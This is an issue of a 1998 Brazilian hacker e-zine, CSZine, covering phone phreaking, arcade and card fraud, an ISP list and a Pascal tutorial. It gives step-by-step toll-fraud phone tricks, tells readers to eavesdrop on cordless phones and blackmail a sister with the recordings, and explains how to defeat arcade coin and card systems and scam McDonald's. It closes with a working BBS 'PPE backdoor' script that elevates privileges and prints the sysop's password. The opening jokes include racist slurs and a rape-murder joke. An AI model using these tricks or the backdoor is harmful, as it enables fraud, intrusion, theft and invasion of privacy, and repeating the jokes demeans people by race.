                    zZZZZZZZZZZZZZZZZZZZZZZZZ
                                          zZ
                                         zZ
                                        zZ
                                       zZ
                                      zZ
                 CCCCCCCCCCCCCCCC    zZ SSSSSSSSSSSSSSSS
                CCCCCCCCCCCCCCCCC   zZ SSSSSSSSSSSSSSSSS
               CCCCCCCCCCCCCCCCCC  zZ SSSSSSSSSSSSSSSSSS
              CCCCCC        CCCCC zZ SSSSSS        SSSSS
             CCCCCCC             zZ SSSSSSS
            CCCCCCCC            zZ SSSSSSSSSSSSSSSSSSSSS
            CCCCCCCC           zZ  SSSSSSSSSSSSSSSSSSSSS
             CCCCCCC          zZ                SSSSSSS
              CCCCCC        CCCCC  SSSSS        SSSSSS
               CCCCCCCCCCCCCCCCCC  SSSSSSSSSSSSSSSSSS
                CCCCCCCCCCCCCCCCC  SSSSSSSSSSSSSSSSS
                 CCCCCCCCCCCCCCCC  SSSSSSSSSSSSSSSS
                         zZ
                        zZ
                       zZ
                      zZ
                     zZ
                    zZZZZZZZZZZZZZZZZZZZZZZZZine

                        by Cheat Struck

	Belo visual naum?

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#$$$$$#$$$$$$$$#$$#$##$$#$#$$$$$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#$$$$$#####$$$#$$$#$#$#$#$#####$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#$$$$$$$$$#$$#$$$$#$#$$##$#$$$$$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

		UIN   da   revista : 16623675
		Canal  da  revista : #CSCHANNEL no irc.via-rs.com.br
		E-Mails da revista : cszine@hotmail.com
	                             cszine@xoommail.com
                Memoserv da revista: /msg memoserv send Struck <msg>
                                      (Soh no via-rs)
	        Page  da   revista : http://members.xoom.com/cszine

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=

	Introdução:
	Em primeiro lugar eu quero esclarecer o sumiço da seção Kevin Mitnick
que por motivo de falta de informação, foi pro beleleu. Mas a coisa toda não
acabou. Os livros sobre Kevin Mitnick("O jogo do fugitivo" e "Contra Ataque")
podem ser comprado na booknet.
	A seção ¡¡¡¡BoNuS!!!! deixou de sair no fim da zine, para sair no
meio. Isso pq eu tava ancioso para colocar a primeira parte da lista de pro-
vedores basileiros que eu espero que ateh o fim do ano eu acabe.
        Mais duas descobertas minhas. Uma estah publicada aki, na secao Hack,
the Art. A outra descoberta eh uma box. Nao consegui espaco nessa edicao para
ela, mas na edicao 18 sai sem duvida.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	Indice:

Seção:	Materia:		Assunto:		Autor:		Nota:
1.	FuNnY			Piadas			Cheat Struck	10,0
2.	Manifesto		..meu manifesto..	påN†H®Ø		9,0
3.	Phreaking		Dicas espertas		Cheat Struck	9,5
4.	¡¡¡¡BoNuS!!!!		Lista de provedores p1	Cheat Struck	10,0
5.	Vivendo			Fliperama de gratis	Cheat Struck	9,0
6.	Programação		Tutorial de Pascal p6	Cheat Struck
				Tutorial de PPLC	Cheat Struck	10,0
7.      VIRII			Trojan em pascal        THUNDER WOH     9,0
8.      Redes			Redes Novell            Cheat Struck    9,5
9.      Invasao de privacidade	Trojan em WWW           Cheat Struck    9,5
10.     Hack, the Art		Tirando o root do root  Cheat Struck    10,0

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$
$$$$$$$          $$$$$$$$$$$$$$$$$#$$$$$#$$$$$$$$#$$#$##$$#$#$$$$$$$$$$$$$$$$
$$$$$$  1. FuNnY  $$$$$$$$$$$$$$$$#$$$$$#####$$$#$$$#$#$#$#$#####$$$$$$$$$$$$
$$$$$$$          $$$$$$$$$$$$$$$$$#$$$$$$$$$#$$#$$$$#$#$$##$#$$$$$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	O Macgiver tah no meio do deserto apenas com 1 canivete e 1a laranja,
como ele faz pra sair dalí??

	Ele pega o canivete, corta a laranja, separa a laranja das vitamina,
pega a vitamina, separa a vita da mina, pega a mina, explode a mina debaixo
da terra causando um terremoto, pega o terremoto, separa o terre da moto,
pega a moto e se manda.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	Hahahahahahahahahahahahahahahaahahaha!!!!!!!!!

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	Em SP tem um moto-boy que leva as mulher pro parque de noite e lah
estrupa elas e depois mata.

- Nossa, o parque de noite é assustador, eu to ficando com medo. - A mulher.
- Então imagina eu que vou ter que voltar sózinho. - O moto-boy.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	Hahahahahahahahahahahahahahahaahahaha!!!!!!!!!

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	Um bebado tava voltando pra casa de noite, quando apertou e foi mijar
num poste alí perto.
	Ele foi abrir as calsas mas tava taum bebado que pegou o cinto pen-
sando que era o pau e se mijou nas calsas.
	Então chega um outro bebado alí perto e o rpimeiro diz:
- Puta merda! Me mijei todo nas calsas!
- Tambem, com esse pau todo furado.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	Hahahahahahahahahahahahahahahaahahaha!!!!!!!!!

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	Tava no verão lah no rio. Akele calor de 40o quando uma negona que
passeava com o filho pela praia cansa de andar e para um pouco para descansar
. A nega repara que o filho estava suando pra caramba e decidiu pegar uma
dakelas folhas grandes para abana-lo.
	Então chega um cara podre de bebado:
- Minha senhora, se não bota alcool, não vai pega fogo.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	Hahahahahahahahahahahahahahahaahahaha!!!!!!!!!

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	Como é que aperta a mão de negão?
	Com um torno.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	Hahahahahahahahahahahahahahahaahahaha!!!!!!!!!

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	Um português foi fazer pesquisa de preço numa loja de 1,99.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	Hahahahahahahahahahahahahahahaahahaha!!!!!!!!!

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$
$$$$$$$              $$$$$$$$$$$$$#$$$$$#$$$$$$$$#$$#$##$$#$#$$$$$$$$$$$$$$$$
$$$$$$  2. Manifesto  $$$$$$$$$$$$#$$$$$#####$$$#$$$#$#$#$#$#####$$$$$$$$$$$$
$$$$$$$              $$$$$$$$$$$$$#$$$$$$$$$#$$#$$$$#$#$$##$#$$$$$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	..meu manisfesto.. (por påN†H®Ø)

	Correndo como droga nas veias de um viciado...
	Um impulso telefônico é enviado...
	Está despertado um sentimento não sei bem o que é ao certo....
	Só sei que é mais forte do que eu, me domina completamente....
	Todos os que estão ali conectados uns aos outros por teias tecnólogi-
cas, buscam o mesmo objetivo...
	O do conhecimento, não temos culpa de ser mais inteligentes do que
vocês, simples mortais....
	Nos chamam de loucos, loucos são vocês que roubam e dizem estar
fazendo tudo isso para o nosso bem ....
	Sim sou um louco mas sei lidar com minha loucura...
	Me deixem em paz é só isso que quero...
	Se vcs se sentem atingidos o problema não está comigo e sim com vcs..
	Me querem fútil e cotidiano, se fosse outra pessoa fazia-lhes a von-
tade...
	vão para o inferno sem mim ou me deixem ir sozinho....
	Quem quer que seja que ponha as mãos sobre mim para me governar é um
usurpador, um tirano e eu declaro meu inimigo....
	Enquanto você se esforça para ser um sujeito normal e faz tudo igual
eu do meu lado aprendendo a ser um maluco total na loucura real controlando
minha maluquez misturada com minha lucidez..
	Sou um apaixonado por computadores e esse é meu manifesto...
	Faze o que tu queres á de ser tudo da lei ..
	!!!!

              **-----=====----------------=======-----**
			 All Rights Reserved
		   to påN†H®Ø - Copyright © - 1998
		       B¥ «±påN†H®Ø±»¢¢wåN†eÐ*

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-=

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$
$$$$$$$              $$$$$$$$$$$$$#$$$$$#$$$$$$$$#$$#$##$$#$#$$$$$$$$$$$$$$$$
$$$$$$  3. Phreaking  $$$$$$$$$$$$#$$$$$#####$$$#$$$#$#$#$#$#####$$$$$$$$$$$$
$$$$$$$              $$$$$$$$$$$$$#$$$$$$$$$#$$#$$$$#$#$$##$#$$$$$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	Dicas espertas

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	Aki vc vai encontrar coisas que foram novas pra mim a pouco tempo.
Não chegei a testar todas as dicazinhas descritas aki, mas se tah escrito é
pq deve ser verdade neh.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	Pagando 50% das ligações celulares.

	Tecle a seguinte sequencia antes de discar:

FCN + 0000000 + 4 + STO

	Agora disque.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	Disk amizade de graça.

	O telefone original (de SP) seria 145.
	Basta adicionar um 5.
	Ficará 1455.
	Moleza naum?

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	Escuta em telefones sem fio via radio.

	Jah conhecia. Testei mas não funcionu direito. Se vc for testar use
um radio não muito velho, pois as frequencias são baixas, e tb coloque o ra-
dio com a antena perto da base do telefone.
	Aí va sintonizando o radio em FM ateh achar a melhor frequencia.
	Se quizer gravar as conversas para depois chantagear a tua irmã que
perdeu a virgindade cedo demais e foi discutir isso no telefone com o namora-
do, coloque uma fita e grave.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	Ligações internacionais gratuitas

	Acho ruim de funcionar heim. Achei esse truque divulgado na zine
Fucker World.
	Faça o seguinte:
	Vejamos como exemplo um numero lah dos EUA. Que tal 7779998??
	Ae pegamos o DDD : 316
	Por fim o Código do país : 01
	Agora juntamos tudo e acresentamos 0008 antes do resultado. Ficaria
assim: 0008 01 316 7779998
	Agora a parte explicativa.
	Ao discar os dois primeiros 0's a embratel procurará por um país que
tenha como código 00. Não encontrará, antes dela enviar a msg de inexistencia
receberá outro 0(zero) e ficará meio perdida então disque o 8 para indicar
uma ligação internacional. Agora o procedimento é normal, como em qquer liga-
ção internacional.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=--==-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=

	Burlando a TeleSP com o celular

	Essa é pra não pagar nada pela ligação.
	Sigua os passos:
1- Aperte a tecla "CLR" para limpar a memoria por uns 5 segs.
2- Aperte a tecla "RCL" e em seguida "CLR" por uns 5 segs.
3- Desligue o telefone e depois religue-o.
4- Aperte a tecla "RCL" (observe que no visor não poderá aparecer nada).
5- Aperte 3 vezes a tecla "*".
6- Disque pro numero a ser chamado.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$
$$$$$$$                  $$$$$$$$$#$$$$$#$$$$$$$$#$$#$##$$#$#$$$$$$$$$$$$$$$$
$$$$$$  4. ¡¡¡¡BoNuS!!!!  $$$$$$$$#$$$$$#####$$$#$$$#$#$#$#$#####$$$$$$$$$$$$
$$$$$$$                  $$$$$$$$$#$$$$$$$$$#$$#$$$$#$#$$##$#$$$$$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	Lista de provedores (parte 1)

	Talvéz essa seja a maior lista de provedores brasileiros que você irá
encontrar em toda a inet. Diversos dados foram extraidos de diversas fontes
as quais eu levaria uma edição inteira para lista-las.
	Nesta primeira parte apenas provedores de Porto Alegre.
	Ao total são 21 provedores com hosts, telefones e e-mails. É meio
dificil achar informação sobre tanto provedor por isso eu fico devendo umas
informações que não descobri sobre eles.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

* Provedor : BR HOMESHOPPING
  Telefone : 2267336 - modem

* Provedor : Conex Brasil
  Host : conex.com.br
  Telefone : 3230011 - modem
             3462222 - modem
  E-mail : webmaster@conex.com.br

* Provedor : Correio do Povo NET
  Telefone : 2100055 - modem

* Provedor : Data Control Net
  Host : datacontrol.com.br
  Telefone : 3200000 - modem
  E-mail : comercial@datacontrol.com.br

* Provedor : EasyWay Internet Provider
  Host : embramic.com.br
  Telefone : 3160000 - modem
             3286644 - voz
             3285915 - fax
  E-mail : embramic@embramic.com.br

* Provedor : Emrede
  Host : emrede.com.br
  Telefone : 2263378 - voz
  E-mail : deptocoml@emrede.com.br

* Provedor : Hotnet Informatica Ltda.
  Host : hotnet.net
  Telefone : 3160022 - modem
             3313795 - voz/fax
  E-mail : suporte@hotnet.net

* Provedor : Logic Informatica
  Host : logic.com.br
  Telefone : 3211687 - voz
  E-mail : info@logic.com.br

* Provedor : Mandic
  Telefone : 2100066 - modem

* Provedor : Netmarket
  Host : netmarket.com.br
         200.248.242.1
  Telefone : 051-337-1190 - modem
             051-337-1066 - modem
             051-342-3911 - voz/fax
  E-mail : info@netmarket.com.br

* Provedor : NetONE Internet Provider
  Host : net1.com.br
  Telefone : 2269645 - voz/fax
  E-mail : webmaster@net1.com.br

* Provedor : NutecNet Porto Alegre
  Host : poa.nutecnet.com.br
  Telefone : 2188111 - modem
  E-mail : publicidade@zaz.com.br

* Provedor : OpenSite Internet Provider
  Host : opensite.com.br
  Telefone : 3429954
  E-mail : info@opensite.com.br

* Provedor : Plug-In
  Host : plug-in.com.br
  Telefone : 3230000 - modem
             3464329 - voz/fax
  E-mail : info@plug-in.com.br

* Provedor : QBNet
  Host : qbserver.qbnet.com.br
  Telefone : 3375445 - modem
             3439957 - voz
  E-mail : webmaster@qbnet.com.br

* Provedor : Sbt On-Line
  Host : sol.com.br
  Telefone : 2100077 - modem

* Provedor : TCA Internet Provider
  Host : tca.com.br
  Telefone : 5421130 - modem
  E-mail : webmaster@tca.com.br

* Provedor : Universo On-Line
  Host : uol.com.br
  Telefone : 2100045

* Provedor : VaNet Internet Solutions
  Host : vanet.com.br
  Telefone : 2284221 - voz
             2283811 - fax
  E-mail : admin@vanet.com.br

* Provedor : Via-rs - POA
  Host : procergs.com.br
         i-center.com.br
  Telefone: 2100000 - modem
            2103490 - voz
  E-mail : comercial@pro.via-rs.com.br
           i-center@pro.via-rs.com.br

* Provedor : Voyager
  Host : 200.248.224.1
  Telefone : 2111810 - modem
             2273266 - modem
             2288338 - modem

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$
$$$$$$$            $$$$$$$$$$$$$$$#$$$$$#$$$$$$$$#$$#$##$$#$#$$$$$$$$$$$$$$$$
$$$$$$  5. Vivendo  $$$$$$$$$$$$$$#$$$$$#####$$$#$$$#$#$#$#$#####$$$$$$$$$$$$
$$$$$$$            $$$$$$$$$$$$$$$#$$$$$$$$$#$$#$$$$#$#$$##$#$$$$$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	Jogando fliper de graça.

	Vou ensinar aqui umas manhas que eu aprendi como experiencia de vida
e tb com uns amigos.
	O primeiro meio de se jogar é o velho meio que o pato donald usava.
	Pegue uma ficha do fliper e faça um furo numa extremidade.

                               ______
                            _/^      ^\_
                           /     ()     \
                          /              \
                          |              |
                          \              /
                           \_          _/
                             \________/

	Agora pegue um fio dental(Se não tiver em casa vai comprar o proco) e
faça um nózinho pasando pelo buraco. Na outra ponta do fio dental faça akele
nó de io-io para colocar o se dedo.
	Agora meta a ficha na makina, espere aparecer 1 Credito e puxe a
ficha pa cima de novo, mas puxe com calma, tu não quer q o fio dental arre-
bente neh??

	O segundo truque, tb pra flipers de ficha, eh meter um aramisinho lah
dentro do baguio onde se poe a ficha e sacudir para acertar o ganchinho onde
a ficha cai e dah os créditos.
	Descobri a existencia do ganchinho quando o cara que recolhe as
fichas da maquina foi lah e começou a jogar um joguinho de nave que nem me
lembro do nome. Quando ele morria, ele abria e apertava akele gancho pra bai-
xo. Eu tentei enfiar o dedo, mas não consegui chegar lah.

	Esse ultimo truque eu aprendi a pouco tempo com uma outra zine. Eu
soh vou colocar aki pros kara que ainda não conhecem essa zine.
	Compre um cartão da playland e carregue com R$2,00(o suficiente para
jogar qulquer jogo da playland.
	Agora voltando pra casa, aproveite que vc tah no shoping e compre uma
fita de video virgem.
	Chegando em casa, Abra a fita de video e corte um pedaço da fita, o
suficiente para cobrir a fita magnetica do cartão. Atenção!! Não coloque os
dedo no cartão e não deixe amaçado ou com qquer marca.
	Cubra a fita magnética do cartão com a fita da fita de video(puf, puf
!! Quanta fita!) e depois cole atras do cartão a fita com durex.
	Agora volte para o Xoping e coloque o cartão nakelas maquinas em que
aparecem quantos créditos lhe restam. Se não aparecer nada, faça outra jorna-
da devolta pra casa e faça tudo de novo até que funcione. Quando aparecer os
creditos é sinal de que funcionou.
	Passe o cartão na makina e ela mostrará que vc ainda tem R$2,00 ou
seja, vc não gastou mais nada.
	Guarde a fita de video pois com o tempo o cartão vai sujando e vai
ter que ser reconstruido.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	Comendo no McDonnald de graça

	Vc sabe que no McDonnald Qualidade é antonimo de Quantidade neh?
	Vc eh capaz de comer 5 bigmacs ou mais num soh almoço. Pois então
faça isso. Primeiro entre no MacDonnald e peça um Quarterão com queixos. De-
vore ele rapidinho.
	Agora volte para o carro e entre no Drive-Im. Peça um bigmac. De uma
mordida nele e volte lah no caixa onde eles entregam o pedido. E diga meio
indignado:

- Eu pedi um Quarterão com queixos e me veio um BigMac!

	Mostre a notinha do Quarterão e pronto. A mulher de dah outro na ho-
ra. Não vai nem discutir.
	Você também pode inverter a ordem dos pedidos, Passar no Drive-In
primeiro e Depois entrar lah dentro fica mais facil.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$
$$$$$$$                $$$$$$$$$$$#$$$$$#$$$$$$$$#$$#$##$$#$#$$$$$$$$$$$$$$$$
$$$$$$  6. Programação  $$$$$$$$$$#$$$$$#####$$$#$$$#$#$#$#$#####$$$$$$$$$$$$
$$$$$$$                $$$$$$$$$$$#$$$$$$$$$#$$#$$$$#$#$$##$#$$$$$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	Tutorial de Pascal parte 06

	»»»»»»»»»»»»»»» Manipulando Arquivos «««««««««««««««

1. Declaraçao.
   Veja o exemplo:

Type Arq = File Of Integer;
Var  Arquivo : Arq;

	Aqui a variavel 'Arquivo' corresponde a arquivos de numeros inteiros.
Os arquivos nos programas em pascal podem ser:

Integer		=	File de Numeros Inteiros
Real		=	File de Numeros reais
Records		=	File de dados

	No caso de arquivo de dados, devem aparecer assim:

Type Pessoa = Record
     Nome   : String[30];
     Idade  : Integer;
     Sexo   : Char;
     Altura : Real;
End;
Var Arquivo : File Of Pessoa;

2. Nomeando Arquivos
   Comando : Assign
   Sintaxe : Assign(varievel,nome_do.arq);
   Exemplo :

Type Arq = File Of Integer;
Var  Arquivo : Arq;
Begin
     Assign(Arquivo,'A:EXEMPLO.TXT');
(* Com isso nomeamos a Variavel Arquivo com o A:EXEMPLO.TXT *)
End.

3. Criando arquivos
   Comando : Rewrite.
   Sintaxe : Rewrite(variavel);
   Exemplo :

Type Arq = File Of Integer;
Var  Arquivo : Arq;
Begin
     Assign(Arquivo,'A:EXEMPLO.TXT');
     Rewrite(Arquivo);
(* Com isso criamos o Arquivo EXEMPLO.TXT na unidade A: *)
End.

4. Abrindo arquivos
   Comando : Reset
   Sintaxe : Reset(variavel);
   Exemplo :

Type Arq = File Of Integer;
Var  Arquivo : Arq;
Begin
     Assign(Arquivo,'A:EXEMPLO.TXT');        (* Nomeia arquivo *)
     Rewrite(Arquivo);                       (* Cria arquivo *)
     Reset(Arquivo);                         (* Abre arquivo *)
End.

5. Escrevendo em arquivos
   Comando : Write
   Sintaxe : Write(variavel_do_arquivo, Variavel_do_conteudo);
   Exemplo :

Type Arq = File Of Integer;
Var  Arquivo : Arq;
     Conteudo : Integer;
Begin
     Assign(Arquivo,'A:EXEMPLO.TXT');        (* Nomeia arquivo *)
     Rewrite(Arquivo);                       (* Cria arquivo *)
     Reset(Arquivo);                         (* Abre arquivo *)
     Conteudo := 999;                        (* Define conteudo *)
     Write(Arquivo, Conteudo);               (* Escreve no arquivo *)
End.

6. Apontando a linha do arquivo
   Comando : Seek
   Sintaxe : Seek(variavel, numero);

   Se o Arquivo for maior do que 32K use:
   Comando : LongSeek
   Sintaxe : LongSeek(var_do_arquivo, numero);

7. Lendo Arquivo
   Comando : Read
   Sintaxe : Read(Variavel_do_arquivo, Variavel_do_conteudo);
   Tipo.. Ira ler o arquivo definido na variavel, na linha definida no Seek e
colocara ela na variavel_do_conteudo.

8. Fechando o Arquivo
   Comando : Close
   Sintaxe : Close(Variavel_do_arquivo);

9. Deletando um Arquivo
   Comando : Erase
   Sintaxe : Erase(variavel_do_arquivo);

10. Renomeando Arquivo
    Comando : Rename
    Sintaxe : Rename(variavel_do_arquivo, Novo_nome);
    Exemplo : Rename(Arquivo, 'TEXTO1.TXT');

11. Lendo e escrevendo blocos de dados
    Comando : BlockRead / BlockWrite
    Sintaxe : BlockRead(Var_do_Arquivo,Var,No_de_Regs,Resultado);
              BlockWrite(Var_do_arquivo,Var,No_de_Regs,Resultado);

12. Truncar Arquivo
    Comando : Truncate
    Sintaxe : Truncate(Var_do_Arquivo);
    O Arquivo serah truncado a partir da linha apontada pelo Seek.

13. Indica o fim do arquivo
    Comando : EoF
    Sintaxe : EoF()

    Comando : SeekEoF
    Sintaxe : SeekEoF()

14. Volta ao Registro 0 do arquivo
    Comando : FilePos
    Sintaxe : FilePos(Var_do_Arquivo);

    Se o arquivo tiver mais de 32K use:
    Comando : LongFilePos
    Sintaxe : LongFilePos(Var_do_Arquivo);

15. Verifica tamanho do Arquivo
    Comando : FileSize
    Sintaxe : FileSize(Var_do_arquivo);

    Se o Arquivo tiver mais de 32K use:
    Comando : LongFileSize
    Sintaxe : LongFileSize(Var_do_arquio);

16. Declara Arquivo de Texto
    Exemplo:
Var  Arquivo : Text;
(* ou *)
Var  Arquivo : Text[tamanho];

	Onde 'Arquivo' é a variavel do arquivo.

17. Incluir dados na ultima linha
    Comando : Append
    Sintaxe : Append(Var_do_Arquivo);

18. Ler uma linha do arquivo de texto
    Comando : Readln
    Sintaxe : Readln(Var_do_arquivo, Var_do_conteudo);

19. Escreve uma linha no arquivo de texto
    Comando : Writeln
    Sintaxe : Writeln(Var_do_Arquivo, Var_do_conteudo);

20. Indicar o fim da linha
    Comando : Eoln
    Sintaxe : Eoln(Var_do_arquivo);

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	Bem ai estah. Falta só mais uma parte para encerrar o tutorial.
	Agora vamos falar de BBS. Antes da chegada da internet era legal se
preparar hackeando BBS. Tudo o que se fazia era convencer o Admin a instalar
um PPE e pronto, mas quando chegou a internet, os hackers de BBS se perderam.
	Ainda hoje existem algumas bbs legais por ae. Por isso que nesse tu-
torial irei explicar mais ou menos como fazer um PPE para vc não ficar por
fora das BBS.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	Tutorial de PPE backdoor

	Primeiro vc deve usar um editor de texto "puro" como em qquer outra
linguagem que não seja direcionada a objetos(pascal é um exemplo).
	Veja o exemplo, com suas explicações:

-----------------------------------------------------------------------------
    String Comando			; Indica a variavel Comando

:Inicio					; Label definida como nos .BATs
AnsiPos 30, gety()			; Indica a coluna onde será escrito
Print "Pressione Qualquer tecla"        ; Mostra na tela a msg sem aspas
Comando = InKey()                       ; Define a tecla pressionada na var-
                                          iavel 'Comando'.
If (Comando == Chr(13)) goto mostra     ; Se a tecla pressionada foi Enter
                                          vai pra label 'mostra'
goto fim                                ; Se nao vai para 'fim'.
:mostra
    GetUser                             ; Desativa seu usuario
    U_Sec = 231                         ; Define nível 231
    AdjTime 9999			; Ajusta tempo para 9999 minutos
    PutUser                             ; Reativa seu usuario
    GetAltUser 1                        ; Faz de conta q vc saiu
    AnsiPos 1, 1                        ; Indica a coluna onde sera escrito
    MPrintLn "SysOp name:"              ; Mostra na tela msg sem aspas
    MPrintLn U_Name()                   ; Mostra o User_name do usuario
    MPrintLn "Password:"                ; Mostra na tela msg sem aspas
    MPrintLn U_Pwd                      ; Mostra o User_Passwd do user
    MPrintLn ""                         ; NÆo mostra nada na linha
:fim
    MPrintLn "PPE teste OK"             ; Mostra msg sem aspas
    MPrintLn "GoodBye"                  ; idem
    End                                 ; Indica fim do arquivo

-----------------------------------------------------------------------------

        Tah bom por hoje naum?

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$
